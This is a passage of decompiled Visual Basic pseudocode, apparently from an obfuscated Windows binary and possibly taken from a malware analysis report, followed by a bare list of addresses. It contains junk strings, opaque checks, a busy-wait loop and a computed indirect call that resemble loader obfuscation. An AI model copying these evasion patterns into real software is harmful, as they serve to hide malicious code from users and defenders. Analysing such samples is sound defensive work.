					_push(_a4);
					_push(_v596);
					L00401906();
					_v708 = _t1189;
				}
				_v300 = _v592;
				_v296 = _v588;
				_v8 = 0x34;
				_v584 =  *0x4013b8;
				_v760 =  *0x4013b4;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x2821,  &_v584, _t1375,  &_v556);
				_v168 = _v556;
				_v8 = 0x35;
				_v556 = 0x4ea1;
				_v564 = 0x8904d3f8;
				_t1203 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v564,  &_v556,  &_v568);
				_v596 = _t1203;
				if(_v596 >= 0) {
					_t548 =  &_v712;
					 *_t548 = _v712 & 0x00000000;
					__eflags =  *_t548;
				} else {
					_push(0x714);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v712 = _t1203;
				}
				_v204 = _v568;
				_v8 = 0x36;
				L004018EE();
				_v8 = 0x37;
				_t1207 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v556, 0xffffffff);
				asm("fclex");
				_v596 = _t1207;
				if(_v596 >= 0) {
					_t563 =  &_v716;
					 *_t563 = _v716 & 0x00000000;
					__eflags =  *_t563;
				} else {
					_push(0x1b8);
					_push(0x41046c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v716 = _t1207;
				}
				_t1213 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v600 = _t1213;
				if(_v600 >= 0) {
					_t574 =  &_v720;
					 *_t574 = _v720 & 0x00000000;
					__eflags =  *_t574;
				} else {
					_push(0x1bc);
					_push(0x41046c);
					_push(_a4);
					_push(_v600);
					L00401906();
					_v720 = _t1213;
				}
				_v8 = 0x38;
				_v448 = _v448 & 0x00000000;
				_v444 = _v444 & 0x00000000;
				_v456 = 6;
				L004018E8();
				while(1) {
					_v8 = 0x3a;
					_v448 = 1;
					_v456 = 2;
					L004018E2();
					_t1377 =  &_v132;
					L004018E8();
					_v8 = 0x3b;
					_v556 = 0x1e2c;
					_v564 =  *0x4013b0;
					 *_t1442 =  *0x4013a8;
					 *((intOrPtr*)( *_a4 + 0x758))(_a4,  &_v564, 0x539a9640, 0x5af4,  &_v556, _t1377, _t1377,  &_v344,  &_v456,  &_v132);
					_v8 = 0x3c;
					_t1225 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v564);
					_v596 = _t1225;
					if(_v596 >= 0) {
						_t609 =  &_v724;
						 *_t609 = _v724 & 0x00000000;
						__eflags =  *_t609;
					} else {
						_push(0x704);
						_push(0x41049c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v724 = _t1225;
					}
					_v100 = _v564;
					_v8 = 0x3d;
					 *((intOrPtr*)( *_a4 + 0x738))(_a4);
					_v8 = 0x3e;
					_t1231 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
					_v596 = _t1231;
					if(_v596 >= 0) {
						_t626 =  &_v728;
						 *_t626 = _v728 & 0x00000000;
						__eflags =  *_t626;
					} else {
						_push(0x6f8);
						_push(0x41049c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v728 = _t1231;
					}
					_v8 = 0x3f;
					_v556 = 0x1854;
					_v584 =  *0x401458;
					 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0xbb1ac,  &_v556,  &_v592);
					_v292 = _v592;
					_v8 = 0x40;
					_v556 = 0x5bd9;
					_v584 =  *0x401450;
					 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
					_v284 = _v560;
					_v8 = 0x41;
					_t1248 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
					_v596 = _t1248;
					if(_v596 >= 0) {
						_t660 =  &_v732;
						 *_t660 = _v732 & 0x00000000;
						__eflags =  *_t660;
					} else {
						_push(0x6fc);
						_push(0x41049c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v732 = _t1248;
					}
					_v280 = _v556;
					_v8 = 0x42;
					_t1253 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
					_v596 = _t1253;
					if(_v596 >= 0) {
						_t674 =  &_v736;
						 *_t674 = _v736 & 0x00000000;
						__eflags =  *_t674;
					} else {
						_push(0x718);
						_push(0x41049c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v736 = _t1253;
					}
					_v232 = _v564;
					_v8 = 0x43;
					L004018F4();
					_v556 = 0x5b73;
					 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
					_t1520 = _v584;
					_v48 = _t1520;
					L00401924();
					_v8 = 0x44;
					_v448 = 0x2ffff;
					_v456 = 0x8003;
					_push( &_v132);
					_t1261 =  &_v456;
					_push(_t1261);
					L004018DC();
					_t1262 = _t1261;
					if(_t1262 == 0) {
						break;
					}
				}
				_v8 = 0x47;
				_v448 = 0xe8;
				do {
					_t1262 = _t1262 + 1;
					__eflags = _t1262 - 0xfff9a5cb;
				} while (_t1262 != 0xfff9a5cb);
				 *_t1442(_t1262 + 0x46f11c);
				asm("movsb");
				L004018E8();
				_v8 = 0x48;
				_v572 = 0x8904d3f8;
				_v568 = 0x98e72e79;
				_v564 = 0x5f72a;
				_push(0x98e72e79);
				_push(L"bangsternears");
				_t1265 =  &_v320;
				_push(_t1265);
				L004018D6();
				_push(_t1265);
				_push( &_v572);
				_push( &_v568);
				_push( &_v564);
				_push(0x8310a4);
				_push(L"samtaleemnetsrhes");
				_t1269 =  &_v316;
				_push(_t1269);
				L004018D6();
				_push(_t1269);
				_push(L"Charcuterieganocephalantu");
				_t1270 =  &_v312;
				_push(_t1270);
				L004018D6();
				_push(_t1270);
				E004114DC();
				_v576 = _t1270;
				L004018D0();
				__eflags = _v576 - 0x8904d3f8;
				_v596 =  ~(0 | _v576 == 0x8904d3f8);
				_push( &_v320);
				_push( &_v316);
				_push( &_v312);
				_push(3);
				L004018CA();
				_t1443 = _t1442 + 0x10;
				__eflags = _v596;
				if(_v596 != 0) {
					_v8 = 0x49;
					_v8 = 0x4a;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v740 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v740 = 0x4183d8;
					}
					_v596 =  *_v740;
					_t1354 =  &_v344;
					L004018B2();
					_t1443 = _t1443 + 0x10;
					L004018B8();
					_t1355 =  &_v324;
					L004018BE();
					_t1358 =  *((intOrPtr*)( *_v596 + 0xc))(_v596, _t1355, _t1355, _t1354, _t1354, _t1354, _v164, L"M9uACtmJ7nAtSvje8kbN9w249", 0);
					asm("fclex");
					_v600 = _t1358;
					__eflags = _v600;
					if(_v600 >= 0) {
						_t733 =  &_v744;
						 *_t733 = _v744 & 0x00000000;
						__eflags =  *_t733;
					} else {
						_push(0xc);
						_push(0x4119b8);
						_push(_v596);
						_push(_v600);
						L00401906();
						_v744 = _t1358;
					}
					L004018AC();
					L00401912();
				}
				_v8 = 0x4c;
				_v564 = 0x792720;
				_t739 =  &_v564; // 0x792720
				_push(L"bangsternears");
				_t1279 =  &_v312;
				_push(_t1279);
				L004018D6();
				_push(_t1279);
				E00411544();
				_v556 = _t1279;
				L004018D0();
				asm("sbb eax, eax");
				_v596 =  ~( ~(_v556 - 0x8904d3f8) + 1);
				L00401924();
				__eflags = _v596;
				if(_v596 != 0) {
					_v8 = 0x4d;
					_v8 = 0x4e;
					_v448 = L"rebslagerierneshand";
					_v456 = 8;
					_v480 = 0x6e5392;
					_v488 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25");
					_push(_v40);
					L004018FA();
					_t1443 = _t1443 + 0x2c;
				}
				_v8 = 0x50;
				_push(0x8904d3f8);
				_push(L"Statscheferstronhi8");
				_t1286 =  &_v316;
				_push(_t1286);
				L004018D6();
				_push(_t1286);
				_push(L"encryptions");
				_t1287 =  &_v312;
				_push(_t1287);
				L004018D6();
				_push(_t1287);
				_push(0x753eca);
				_push(0x3db7db);
				_push(0x8904d3f8);
				E00411584();
				_v564 = _t1287;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				_v596 =  ~(0 | _v564 == 0x98e72e79);
				_push( &_v316);
				_push( &_v312);
				_push(2);
				L004018CA();
				_t1444 = _t1443 + 0xc;
				_t1293 = _v596;
				__eflags = _t1293;
				if(_t1293 != 0) {
					_v8 = 0x51;
					_v8 = 0x52;
					_push(0);
					_push(L"sykofanter");
					_push( &_v344);
					L00401918();
					_t1293 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v264);
					L0040191E();
					L00401912();
				}
				_v8 = 0x54;
				_push(0x3a3aea);
				_push(0x8904d3f8);
				_push(0x98e72e79);
				_push(0x98e72e79);
				E004115D4();
				_v564 = _t1293;
				L004018D0();
				__eflags = _v564 - 0x404672;
				if(_v564 == 0x404672) {
					_v8 = 0x55;
					_v8 = 0x56;
					_v448 = L"rebslagerierneshand";
					_v456 = 8;
					L004018A0();
					_push(2);
					_t1293 =  &_v344;
					_push(_t1293);
					L004018A6();
					_v200 = _t1520;
					L00401912();
				}
				_v8 = 0x58;
				_push(0x350dde);
				_push(0x58e1c9);
				E00411624();
				_v564 = _t1293;
				L004018D0();
				__eflags = _v564 - 0x5bdd58;
				if(_v564 == 0x5bdd58) {
					_v8 = 0x59;
					_v384 = 0x80020004;
					_v392 = 0xa;
					_v368 = 0x80020004;
					_v376 = 0xa;
					_v352 = 0x80020004;
					_v360 = 0xa;
					_v448 = L"Charcuterieganocephalantu";
					_v456 = 8;
					L004018A0();
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push(0);
					_push( &_v344);
					L0040189A();
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_t1293 =  &_v344;
					_push(_t1293);
					_push(4);
					L00401942();
					_t1444 = _t1444 + 0x14;
				}
				_v8 = 0x5b;
				L004018F4();
				_push(_t1293);
				_push( &_v316);
				L004018D6();
				_push(0x8904d3f8);
				_t1295 =  &_v316;
				_push(_t1295);
				E00411698();
				_v564 = _t1295;
				L004018D0();
				__eflags = _v564 - 0x272878;
				_v596 =  ~(0 | _v564 == 0x00272878);
				_push( &_v316);
				_push( &_v312);
				_push(2);
				L004018CA();
				_t1301 = _v596;
				__eflags = _t1301;
				if(_t1301 != 0) {
					_v8 = 0x5c;
					_push(L"LAANELOFTERNE");
					L00401894();
				}
				_v8 = 0x5e;
				_push(0x8904d3f8);
				_push(0xd2930);
				E004116E4();
				_v564 = _t1301;
				L004018D0();
				__eflags = _v564 - 0x8904d3f8;
				if(_v564 == 0x8904d3f8) {
					_v8 = 0x5f;
					_v448 = L"samtaleemnetsrhes";
					_v456 = 8;
					L004018A0();
					_push( &_v344);
					L0040188E();
					L00401912();
				}
				_v8 = 0x61;
				_push(L"Gooiest4");
				_t1302 =  &_v312;
				_push(_t1302);
				L004018D6();
				_push(_t1302);
				_push(0x98e72e79);
				E00411728();
				_v564 = _t1302;
				L004018D0();
				__eflags = _v564 - 0x86be28;
				_v596 =  ~(0 | _v564 == 0x0086be28);
				L00401924();
				_t1306 = _v596;
				__eflags = _t1306;
				if(_t1306 != 0) {
					_v8 = 0x62;
					_v8 = 0x63;
					_v448 = L"Porto7";
					_v456 = 8;
					L004018A0();
					_push(2);
					_t1306 =  &_v344;
					_push(_t1306);
					L004018A6();
					_v160 = _t1520;
					L00401912();
				}
				_v8 = 0x65;
				_push(0x753f16);
				_push(0x98e72e79);
				_push(0x49db89);
				E0041176C();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				if(_v564 == 0x98e72e79) {
					_v8 = 0x66;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v748 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v748 = 0x4183d8;
					}
					_v596 =  *_v748;
					_t1338 =  &_v324;
					L004018BE();
					_t1306 =  *((intOrPtr*)( *_v596 + 0x10))(_v596, _t1338, _t1338, _a4);
					asm("fclex");
					_v600 = _t1306;
					__eflags = _v600;
					if(_v600 >= 0) {
						_t865 =  &_v752;
						 *_t865 = _v752 & 0x00000000;
						__eflags =  *_t865;
					} else {
						_push(0x10);
						_push(0x4119b8);
						_push(_v596);
						_push(_v600);
						L00401906();
						_v752 = _t1306;
					}
					L004018AC();
				}
				_v8 = 0x68;
				_push(0x2a551);
				_push(0x98e72e79);
				_push(0x8904d3f8);
				E004117B4();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x8904d3f8;
				if(_v564 == 0x8904d3f8) {
					_v8 = 0x69;
					_t1329 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v324);
					asm("fclex");
					_v596 = _t1329;
					__eflags = _v596;
					if(_v596 >= 0) {
						_t881 =  &_v756;
						 *_t881 = _v756 & 0x00000000;
						__eflags =  *_t881;
					} else {
						_push(0x160);
						_push(0x41046c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v756 = _t1329;
					}
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v760 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v760 = 0x4183d8;
					}
					_v600 =  *_v760;
					_v628 = _v324;
					_v324 = _v324 & 0x00000000;
					_t1333 =  &_v328;
					L00401888();
					_t1306 =  *((intOrPtr*)( *_v600 + 0x40))(_v600, _t1333, _t1333, _v628, L"incomprehensible");
					asm("fclex");
					_v604 = _t1306;
					__eflags = _v604;
					if(_v604 >= 0) {
						_t901 =  &_v764;
						 *_t901 = _v764 & 0x00000000;
						__eflags =  *_t901;
					} else {
						_push(0x40);
						_push(0x4119b8);
						_push(_v600);
						_push(_v604);
						L00401906();
						_v764 = _t1306;
					}
					L004018AC();
				}
				_v8 = 0x6b;
				_push(0x8904d3f8);
				E004117FC();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				if(_v564 == 0x98e72e79) {
					_v8 = 0x6c;
					_v8 = 0x6d;
					_v432 = 0x80020004;
					_v440 = 0xa;
					_v416 = 0x80020004;
					_v424 = 0xa;
					_v400 = 0x80020004;
					_v408 = 0xa;
					_v384 = 0x80020004;
					_v392 = 0xa;
					_v368 = 0x80020004;
					_v376 = 0xa;
					_v352 = 0x80020004;
					_v360 = 0xa;
					_v448 = L"samtaleemnetsrhes";
					_v456 = 8;
					L004018A0();
					_push( &_v440);
					_push( &_v424);
					_push( &_v408);
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push( &_v344);
					L0040187C();
					L00401882();
					_push( &_v440);
					_push( &_v424);
					_push( &_v408);
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push( &_v344);
					_push(7);
					L00401942();
				}
				_v8 = 0x6f;
				_push(L"Gastriloquy");
				_t1307 =  &_v312;
				_push(_t1307);
				L004018D6();
				_push(_t1307);
				E00411858();
				_v564 = _t1307;
				L004018D0();
				__eflags = _v564 - 0x2ee60b;
				_v596 =  ~(0 | _v564 == 0x002ee60b);
				L00401924();
				_t1311 = _v596;
				__eflags = _t1311;
				if(__eflags != 0) {
					_v8 = 0x70;
					_v8 = 0x71;
					_push(0x1c);
					L00401876();
					_v144 = _t1311;
				}
				_v8 = 0x73;
				asm("fldz");
				L00401756();
				L0040193C();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v8 = 0x74;
					L00401870();
				}
				_v20 = 0;
				asm("wait");
				_push(0x41491b);
				L004018AC();
				L004018AC();
				L00401912();
				L00401912();
				L00401924();
				L004018AC();
				L004018AC();
				L004018AC();
				return _t1311;
			}




































































































































































































              0x00412877
              0x00412886
              0x00412892
              0x0041289a
              0x0041289d
              0x004128aa
              0x004128b3
              0x004128b6
              0x004128c5
              0x004128c8
              0x004128cf
              0x004128d6
              0x004128e0
              0x004128ea
              0x004128f4
              0x004128fe
              0x00412908
              0x00412918
              0x0041291f
              0x00412926
              0x00412927
              0x0041292f
              0x00412932
              0x00412936
              0x00412939
              0x0041293d
              0x00412940
              0x00412945
              0x00412951
              0x00412958
              0x0041295f
              0x00412960
              0x00412962
              0x00412967
              0x0041296a
              0x00412971
              0x0041297b
              0x00412985
              0x0041298f
              0x00412999
              0x00412999
              0x004129a0
              0x004129aa
              0x004129b4
              0x004129c4
              0x004129cb
              0x004129d2
              0x004129d9
              0x004129e0
              0x004129e1
              0x004129ec
              0x004129ed
              0x004129f3
              0x004129f4
              0x004129f9
              0x004129fa
              0x004129ff
              0x00412a04
              0x00412a0a
              0x00412a0c
              0x00412a0d
              0x00412a1b
              0x00412a1b
              0x00412a1b
              0x00412a0f
              0x00412a0f
              0x00412a0f
              0x00412a2a
              0x00412a31
              0x00412a37
              0x00412a42
              0x00412a49
              0x00412a50
              0x00412a57
              0x00412a5e
              0x00412a5f
              0x00412a61
              0x00412a66
              0x00412a69
              0x00412a72
              0x00412a74
              0x00412a7b
              0x00412a82
              0x00412a84
              0x00412a8f
              0x00412a90
              0x00412a97
              0x00412a98
              0x00412aa5
              0x00412aa6
              0x00412aa7
              0x00412aa8
              0x00412aa9
              0x00412aab
              0x00412aae
              0x00412ab3
              0x00412ab9
              0x00412ab9
              0x00412abe
              0x00412ac5
              0x00412aca
              0x00412ad3
              0x00412ad5
              0x00412ae6
              0x00412aec
              0x00412aee
              0x00412af4
              0x00412afb
              0x00412b1d
              0x00412b1d
              0x00412b1d
              0x00412afd
              0x00412afd
              0x00412b02
              0x00412b07
              0x00412b0a
              0x00412b10
              0x00412b15
              0x00412b15
              0x00412afb
              0x00412b24
              0x00412b2b
              0x00412b35
              0x00412b3f
              0x00412b49
              0x00412b59
              0x00412b60
              0x00412b61
              0x00412b63
              0x00412b64
              0x00412b65
              0x00412b68
              0x00412b6a
              0x00412b6b
              0x00412b6c
              0x00412b6f
              0x00412b71
              0x00412b72
              0x00412b73
              0x00412b76
              0x00412b7b
              0x00412b80
              0x00412b86
              0x00412b88
              0x00412b89
              0x00412b97
              0x00412b97
              0x00412b97
              0x00412b8b
              0x00412b8b
              0x00412b8b
              0x00412ba6
              0x00412bb3
              0x00412bba
              0x00412bbb
              0x00412bbd
              0x00412bc2
              0x00412bce
              0x00412bd4
              0x00412bdb
              0x00412be5
              0x00412beb
              0x00412bf5
              0x00412bff
              0x00412c09
              0x00412c13
              0x00412c1d
              0x00412c20
              0x00412c2d
              0x00412c2e
              0x00412c2f
              0x00412c30
              0x00412c31
              0x00412c34
              0x00412c41
              0x00412c42
              0x00412c43
              0x00412c44
              0x00412c45
              0x00412c48
              0x00412c55
              0x00412c56
              0x00412c57
              0x00412c58
              0x00412c59
              0x00412c5b
              0x00412c60
              0x00412c66
              0x00412c6b
              0x00412c6b
              0x00412c6e
              0x00412c84
              0x00412c8a
              0x00412c97
              0x00412cb9
              0x00412cb9
              0x00412cb9
              0x00412c99
              0x00412c99
              0x00412c9e
              0x00412ca3
              0x00412ca6
              0x00412cac
              0x00412cb1
              0x00412cb1
              0x00412cc6
              0x00412cc9
              0x00412cd8
              0x00412cde
              0x00412ce5
              0x00412d0c
              0x00412d12
              0x00412d1f
              0x00412d4a
              0x00412d50
              0x00412d5d
              0x00412d7f
              0x00412d7f
              0x00412d7f
              0x00412d5f
              0x00412d5f
              0x00412d64
              0x00412d69
              0x00412d6c
              0x00412d72
              0x00412d77
              0x00412d77
              0x00412d8c
              0x00412d95
              0x00412d98
              0x00412da5
              0x00412dd0
              0x00412dd6
              0x00412de3
              0x00412e05
              0x00412e05
              0x00412e05
              0x00412de5
              0x00412de5
              0x00412dea
              0x00412def
              0x00412df2
              0x00412df8
              0x00412dfd
              0x00412dfd
              0x00412e12
              0x00412e1e
              0x00412e24
              0x00412e33
              0x00412e39
              0x00412e46
              0x00412e68
              0x00412e68
              0x00412e68
              0x00412e48
              0x00412e48
              0x00412e4d
              0x00412e52
              0x00412e55
              0x00412e5b
              0x00412e60
              0x00412e60
              0x00412e6f
              0x00412e76
              0x00412e85
              0x00412ead
              0x00412eb9
              0x00412ebc
              0x00412ec3
              0x00412ed2
              0x00412efa
              0x00412f07
              0x00412f0e
              0x00412f24
              0x00412f2a
              0x00412f37
              0x00412f59
              0x00412f59
              0x00412f59
              0x00412f39
              0x00412f39
              0x00412f3e
              0x00412f43
              0x00412f46
              0x00412f4c
              0x00412f51
              0x00412f51
              0x00412f67
              0x00412f6e
              0x00412f84
              0x00412f8a
              0x00412f97
              0x00412fb9
              0x00412fb9
              0x00412fb9
              0x00412f99
              0x00412f99
              0x00412f9e
              0x00412fa3
              0x00412fa6
              0x00412fac
              0x00412fb1
              0x00412fb1
              0x00412fc6
              0x00412fcc
              0x00412fde
              0x00412fe3
              0x00413009
              0x00413015
              0x0041301e
              0x00413023
              0x0041302a
              0x00413039
              0x00413061
              0x0041306d
              0x00413073
              0x00413089
              0x00413095
              0x0041309b
              0x004130aa
              0x004130b0
              0x004130bd
              0x004130df
              0x004130df
              0x004130df
              0x004130bf
              0x004130bf
              0x004130c4
              0x004130c9
              0x004130cc
              0x004130d2
              0x004130d7
              0x004130d7
              0x004130e6
              0x004130f8
              0x0041311d
              0x00413129
              0x0041312c
              0x00413132
              0x00413137
              0x0041313e
              0x0041314e
              0x00413174
              0x0041317a
              0x00413189
              0x0041318f
              0x0041319c
              0x004131be
              0x004131be
              0x004131be
              0x0041319e
              0x0041319e
              0x004131a3
              0x004131a8
              0x004131ab
              0x004131b1
              0x004131b6
              0x004131b6
              0x004131c5
              0x004131cc
              0x004131e8
              0x004131fa
              0x00413206
              0x00413212
              0x00413218
              0x0041321f
              0x00413247
              0x00413252
              0x00413258
              0x00413265
              0x00413287
              0x00413287
              0x00413287
              0x00413267
              0x00413267
              0x0041326c
              0x00413271
              0x00413274
              0x0041327a
              0x0041327f
              0x0041327f
              0x0041328e
              0x0041329d
              0x004132a3
              0x004132b0
              0x004132d2
              0x004132d2
              0x004132d2
              0x004132b2
              0x004132b2
              0x004132b7
              0x004132bc
              0x004132bf
              0x004132c5
              0x004132ca
              0x004132ca
              0x004132d9
              0x004132e0
              0x00413302
              0x00413308
              0x00413315
              0x00413329
              0x00413340
              0x0041334d
              0x00413354
              0x0041335b
              0x0041336a
              0x00413392
              0x0041339f
              0x004133a3
              0x004133b0
              0x004133c4
              0x004133d8
              0x004133e5
              0x004133ec
              0x004133f3
              0x00413418
              0x00413423
              0x00413429
              0x00413436
              0x00413458
              0x00413458
              0x00413458
              0x00413438
              0x00413438
              0x0041343d
              0x00413442
              0x00413445
              0x0041344b
              0x00413450
              0x00413450
              0x0041345f
              0x0041346e
              0x00413474
              0x00413481
              0x004134a3
              0x004134a3
              0x004134a3
              0x00413483
              0x00413483
              0x00413488
              0x0041348d
              0x00413490
              0x00413496
              0x0041349b
              0x0041349b
              0x004134aa
              0x004134b1
              0x004134c0
              0x004134e8
              0x004134f5
              0x004134f9
              0x00413500
              0x00413519
              0x00413528
              0x00413533
              0x00413539
              0x00413546
              0x00413568
              0x00413568
              0x00413568
              0x00413548
              0x00413548
              0x0041354d
              0x00413552
              0x00413555
              0x0041355b
              0x00413560
              0x00413560
              0x0041356f
              0x00413585
              0x00413591
              0x00413597
              0x0041359e
              0x004135ad
              0x004135d5
              0x004135e2
              0x004135e9
              0x004135f0
              0x004135ff
              0x0041360d
              0x00413621
              0x00413630
              0x00413636
              0x0041364c
              0x00413652
              0x0041365f
              0x00413681
              0x00413681
              0x00413681
              0x00413661
              0x00413661
              0x00413666
              0x0041366b
              0x0041366e
              0x00413674
              0x00413679
              0x00413679
              0x0041368f
              0x00413696
              0x004136a5
              0x004136ab
              0x004136b8
              0x004136da
              0x004136da
              0x004136da
              0x004136ba
              0x004136ba
              0x004136bf
              0x004136c4
              0x004136c7
              0x004136cd
              0x004136d2
              0x004136d2
              0x004136e1
              0x004136f3
              0x00413718
              0x00413724
              0x0041372a
              0x00413730
              0x00413735
              0x0041373c
              0x00413761
              0x0041376d
              0x00413779
              0x0041377f
              0x0041378c
              0x004137a0
              0x004137b7
              0x004137c4
              0x004137cb
              0x004137e1
              0x004137e7
              0x004137f4
              0x00413816
              0x00413816
              0x00413816
              0x004137f6
              0x004137f6
              0x004137fb
              0x00413800
              0x00413803
              0x00413809
              0x0041380e
              0x0041380e
              0x00413823
              0x0041382f
              0x00413835
              0x00413842
              0x0041386d
              0x00413873
              0x00413880
              0x004138a2
              0x004138a2
              0x004138a2
              0x00413882
              0x00413882
              0x00413887
              0x0041388c
              0x0041388f
              0x00413895
              0x0041389a
              0x0041389a
              0x004138af
              0x004138bb
              0x004138c1
              0x004138ce
              0x004138e2
              0x004138f9
              0x00413906
              0x0041390d
              0x00413914
              0x0041391d
              0x00413944
              0x0041394a
              0x00413957
              0x00413979
              0x00413979
              0x00413979
              0x00413959
              0x00413959
              0x0041395e
              0x00413963
              0x00413966
              0x0041396c
              0x00413971
              0x00413971
              0x00413986
              0x0041398c
              0x00413995
              0x0041399a
              0x004139b0
              0x004139b6
              0x004139b8
              0x004139c5
              0x004139e7
              0x004139e7
              0x004139e7
              0x004139c7
              0x004139c7
              0x004139cc
              0x004139d1
              0x004139d4
              0x004139da
              0x004139df
              0x004139df
              0x00413a03
              0x00413a09
              0x00413a0b
              0x00413a18
              0x00413a3a
              0x00413a3a
              0x00413a3a
              0x00413a1a
              0x00413a1a
              0x00413a1f
              0x00413a24
              0x00413a27
              0x00413a2d
              0x00413a32
              0x00413a32
              0x00413a41
              0x00413a48
              0x00413a4f
              0x00413a56
              0x00413a69
              0x00413a6e
              0x00413a6e
              0x00413a75
              0x00413a7f
              0x00413a9b
              0x00413aa2
              0x00413aa5
              0x00413aaa
              0x00413ab1
              0x00413ac0
              0x00413ace
              0x00413af1
              0x00413af7
              0x00413b0d
              0x00413b13
              0x00413b20
              0x00413b42
              0x00413b42
              0x00413b42
              0x00413b22
              0x00413b22
              0x00413b27
              0x00413b2c
              0x00413b2f
              0x00413b35
              0x00413b3a
              0x00413b3a
              0x00413b4f
              0x00413b52
              0x00413b61
              0x00413b67
              0x00413b76
              0x00413b7c
              0x00413b89
              0x00413bab
              0x00413bab
              0x00413bab
              0x00413b8b
              0x00413b8b
              0x00413b90
              0x00413b95
              0x00413b98
              0x00413b9e
              0x00413ba3
              0x00413ba3
              0x00413bb2
              0x00413bb9
              0x00413bc8
              0x00413bf0
              0x00413bfc
              0x00413c02
              0x00413c09
              0x00413c18
              0x00413c40
              0x00413c4d
              0x00413c54
              0x00413c6a
              0x00413c70
              0x00413c7d
              0x00413c9f
              0x00413c9f
              0x00413c9f
              0x00413c7f
              0x00413c7f
              0x00413c84
              0x00413c89
              0x00413c8c
              0x00413c92
              0x00413c97
              0x00413c97
              0x00413cad
              0x00413cb4
              0x00413cca
              0x00413cd0
              0x00413cdd
              0x00413cff
              0x00413cff
              0x00413cff
              0x00413cdf
              0x00413cdf
              0x00413ce4
              0x00413ce9
              0x00413cec
              0x00413cf2
              0x00413cf7
              0x00413cf7
              0x00413d0c
              0x00413d12
              0x00413d24
              0x00413d29
              0x00413d4f
              0x00413d55
              0x00413d5b
              0x00413d64
              0x00413d69
              0x00413d70
              0x00413d7a
              0x00413d87
              0x00413d88
              0x00413d8e
              0x00413d8f
              0x00413d94
              0x00413d99
              0x00000000
              0x00000000
              0x00413d9b
              0x00413da0
              0x00413da7
              0x00413db1
              0x00413db1
              0x00413db2
              0x00413db2
              0x00413dbf
              0x00413dc3
              0x00413dc4
              0x00413dc9
              0x00413dd0
              0x00413dda
              0x00413de4
              0x00413dee
              0x00413df3
              0x00413df8
              0x00413dfe
              0x00413dff
              0x00413e04
              0x00413e0b
              0x00413e12
              0x00413e19
              0x00413e1a
              0x00413e1f
              0x00413e24
              0x00413e2a
              0x00413e2b
              0x00413e30
              0x00413e31
              0x00413e36
              0x00413e3c
              0x00413e3d
              0x00413e42
              0x00413e43
              0x00413e48
              0x00413e4e
              0x00413e55
              0x00413e64
              0x00413e71
              0x00413e78
              0x00413e7f
              0x00413e80
              0x00413e82
              0x00413e87
              0x00413e91
              0x00413e93
              0x00413e99
              0x00413ea0
              0x00413ea7
              0x00413eae
              0x00413ecb
              0x00413eb0
              0x00413eb0
              0x00413eb5
              0x00413eba
              0x00413ebf
              0x00413ebf
              0x00413edd
              0x00413ef0
              0x00413ef7
              0x00413efc
              0x00413f00
              0x00413f06
              0x00413f0d
              0x00413f21
              0x00413f24
              0x00413f26
              0x00413f2c
              0x00413f33
              0x00413f55
              0x00413f55
              0x00413f55
              0x00413f35
              0x00413f35
              0x00413f37
              0x00413f3c
              0x00413f42
              0x00413f48
              0x00413f4d
              0x00413f4d
              0x00413f62
              0x00413f6d
              0x00413f6d
              0x00413f72
              0x00413f79
              0x00413f83
              0x00413f8a
              0x00413f8f
              0x00413f95
              0x00413f96
              0x00413f9b
              0x00413f9c
              0x00413fa1
              0x00413fa8
              0x00413fbb
              0x00413fc0
              0x00413fcd
              0x00413fd9
              0x00413fdb
              0x00413fdd
              0x00413fe4
              0x00413feb
              0x00413ff5
              0x00413fff
              0x00414009
              0x00414013
              0x00414016
              0x00414023
              0x00414024
              0x00414025
              0x00414026
              0x00414027
              0x0041402a
              0x00414037
              0x00414038
              0x00414039
              0x0041403a
              0x0041403b
              0x0041403d
              0x00414042
              0x00414045
              0x0041404a
              0x0041404a
              0x0041404d
              0x00414054
              0x00414059
              0x0041405e
              0x00414064
              0x00414065
              0x0041406a
              0x0041406b
              0x00414070
              0x00414076
